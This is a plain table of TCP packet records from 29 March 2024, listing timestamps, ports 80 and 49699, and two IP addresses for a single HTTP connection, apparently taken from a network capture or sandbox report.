Mar 29, 2024 14:24:12.028568983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.028611898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.028743982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.028784990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.029335976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.029376984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.029455900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.029529095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.237663984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.237688065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.237735033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.246702909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.246725082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.246786118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.246823072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.247231007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.247260094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.247279882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.247302055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.247891903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.247911930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.247950077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.247965097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.454993010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.455132008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.455174923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.455215931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.461865902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.461903095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.461920023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.461937904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.461966991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.461976051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.462512016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.462575912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.462590933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.462635994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.462651968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.663135052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.663213968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.671053886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.671081066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.671132088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.671149969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.671221972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.671286106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.671632051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.671694994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.671731949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.671775103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.891316891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.891473055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.899732113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.899758101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.899821997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.900026083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.900114059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.900239944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.900254011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.900302887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.109765053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.109800100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.109879017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.109924078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.118452072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.118479013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.118529081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.118545055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.118598938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.118626118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.118650913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.118675947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.118716002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.328114033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.328171968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.328211069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.328258038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.339437962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339507103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.339571953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339586020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339622974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.339642048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339709997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339771032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.339772940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.339868069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.543318987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.543350935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.543416977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.554014921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554069042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554102898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554120064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.554150105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.554235935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554286957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.554477930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554522038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554574966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.554610014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.554774046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.761955023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.761981010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.762029886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.762072086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.775580883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.775651932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.775675058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.775691032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.775722980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.775753975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.776048899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.776063919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.776140928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.776140928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.776253939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.776269913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.776305914 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.991204977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.991239071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.991312027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.991447926 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.992737055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.992763042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.992778063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.992793083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.992808104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.992841959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:13.992852926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.992866993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:13.993164062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.206047058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206202030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.206310034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206418037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.206593990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206640005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206739902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206783056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.206816912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.206830025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.206856012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.427908897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.427937984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.427958012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.427972078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.428086042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.630722046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.630790949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.645703077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.645744085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.645845890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.645884991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.645925999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.645941019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.645958900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.646034002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.646074057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.646114111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.646150112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.856821060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.857625961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.871994972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.872060061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.872153044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.872425079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.872566938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.872622013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.872663021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.872714996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:14.872771025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:14.873563051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.072303057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.072482109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.085983038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.086047888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.086102009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.086153030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.086208105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.086273909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.086277962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.086365938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.086750031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.086796045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.285567999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.289632082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.299706936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299827099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299843073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299860954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299873114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299886942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.299926996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.299997091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.518559933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.518630028 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.528892040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.528964043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.528983116 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.529066086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.529081106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.529100895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.529126883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.529169083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.529191017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.529234886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.529256105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.529301882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.529306889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.531486988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.736360073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.736471891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.745749950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.745852947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.746036053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.746054888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.746087074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.746105909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.746329069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.746341944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.746375084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.746397018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.747977972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.748017073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.748029947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.748033047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.748080969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.748080969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.950033903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.950118065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.958815098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.958910942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.959199905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.959259987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.959328890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.959398031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.959424973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.959474087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.959530115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.961086988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.961153030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.961385965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.961441994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:15.961443901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:15.961491108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.153995037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.154169083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.163304090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.163393974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.163460016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.163505077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.163507938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.163541079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.163568974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.163583040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.163610935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.165105104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.165183067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.165862083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.165905952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.377729893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.377860069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.386219978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.386276007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.386487007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.386535883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.386562109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.386620998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.386722088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.386761904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.386769056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.386814117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.387705088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.387756109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.602116108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.602245092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.610848904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.610933065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.611083984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.611140966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.611253977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.611299992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.611906052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.611951113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.831896067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.832016945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.840379953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.840445042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.840698957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.840742111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.840759039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.840796947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:16.841470957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:16.841511965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.049357891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.049382925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.049426079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.049484015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.058121920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.058177948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.058537960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.058604002 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.272896051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.272926092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.273123980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.281234980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.281303883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.281508923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.281558037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.500164986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.500184059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.500324965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.500324965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.508227110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.508239031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.508250952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.508274078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.508296967 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.727667093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.727777958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.735330105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.735349894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.735367060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.735382080 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.735411882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.735441923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.951539993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.951756001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.959012032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.959033012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.959076881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.959091902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.959141970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.959203005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:17.959208012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:17.959247112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.168306112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:18.168411970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:18.177021027 CET	80	49699	89.238.170.230	192.168.2.7
